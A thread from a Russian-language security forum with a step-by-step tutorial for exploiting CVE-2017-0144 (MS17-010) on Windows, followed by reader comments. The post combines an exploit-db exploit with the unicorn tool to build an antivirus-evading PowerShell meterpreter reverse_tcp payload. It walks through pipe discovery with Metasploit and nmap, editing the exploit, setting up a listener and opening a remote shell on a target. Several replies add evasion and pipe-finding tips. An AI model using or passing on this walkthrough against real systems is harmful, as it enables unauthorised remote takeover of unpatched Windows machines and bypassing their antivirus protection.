• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья CVE-2017-0144 |MS17-010

Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:
Код:
https://www.exploit-db.com/exploits/42315/
и это :
Код:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
и вот это:
Код:
https://github.com/trustedsec/unicorn
Кидаем все в одну папку и создаем файл:
Код:
touch _init_.py
Следующим шагом заходим в metasploit.
Пишем :
Код:
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
Должно появиться это:
2018-06-06_15-24-46.png
Теперь пишем:
Код:
nmap -A -p 445 <ваша цель>
Нас интересует это:
2018-06-06_15-28-10.png
Далее пишем:
Код:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:
2018-06-06_15-32-23.png
Убираем комментарий с этой строчки:
2018-06-06_15-33-36.png
Приводим строчку в такой вид:
2018-06-06_15-35-04.png
Теперь создадим нагрузку:
Код:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:
2018-06-06_15-43-02.png
Удалим кавычку в конце:
2018-06-06_15-44-04.png
Сохраняем файл.
Выставляем прослушку в metasploit :
Код:
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload  windows/meterpreter/reverse_tcp
exploit
Эксплуатируем:
Код:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Выполняем команду до тех пор пока не появиться это:
2018-06-06_15-48-48.png
Нам прилетает сессия)
2018-06-06_15-50-08.png
Протестировано на:
Код:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
 
Последнее редактирование:

CHEATER

Green Team
09.09.2017
79
43
BIT
0
У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
Как говорил @SooLFaa
2018-06-06_17-24-19.png

2018-06-06_17-24-43.png

Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
 
  • Нравится
Реакции: Dmitry88

CHEATER

Green Team
09.09.2017
79
43
BIT
0
Как говорил @SooLFaa Посмотреть вложение 19038
Посмотреть вложение 19039
Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
Позвольте уточнить один момент: какое отношение к powershell имеет вот это?
Snymok.png
 

CHEATER

Green Team
09.09.2017
79
43
BIT
0
Ты действовал по моему методу?
Нет, это просто изображение для наглядности.
Насколько я помню (возможно информация не верна, так-как все могло измениться) psexec avast не видит. Так что, оба метода должны закончится успешно.
P.S Вы можете взять классический eternalblue, написать: set payload windows/exec; set CMD calc.exe и посмотреть на результат.
 
  • Нравится
Реакции: Tihon49

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 997
BIT
1
Шикарная тема.Отлично раскрыты метод атаки и работа эксплойта.
Такие темы идут в золотой фонд форума.
Спасибо,с удовольствием читается.
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )
Еще как умеет)) Предположительно, чтобы были пайпы на машине, должно быть включено сетевое обнаружение с гостевой учеткой
2018-06-07_11-48-38.png

2018-06-07_11-48-58.png

2018-06-07_11-49-30.png
 
Последнее редактирование:
  • Нравится
Реакции: Yakamara

skill

Green Team
06.02.2018
33
25
BIT
0
Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое

И этот эксп уже бесполезен

и кавычку можно и не удалять что на скрине и разобрав его до конца пишите типа копипаст
 
  • Нравится
Реакции: GlowFisch и andrey.system

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое
Это связка эксплойтов.

И этот эксп уже бесполезен
Не соглашусь)
 

skill

Green Team
06.02.2018
33
25
BIT
0
Недостойное поведение
Что и требовалось понять что мамкин хекер до конца не поняв что это пытается думать мега хакер
 
  • Нравится
Реакции: GlowFisch
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!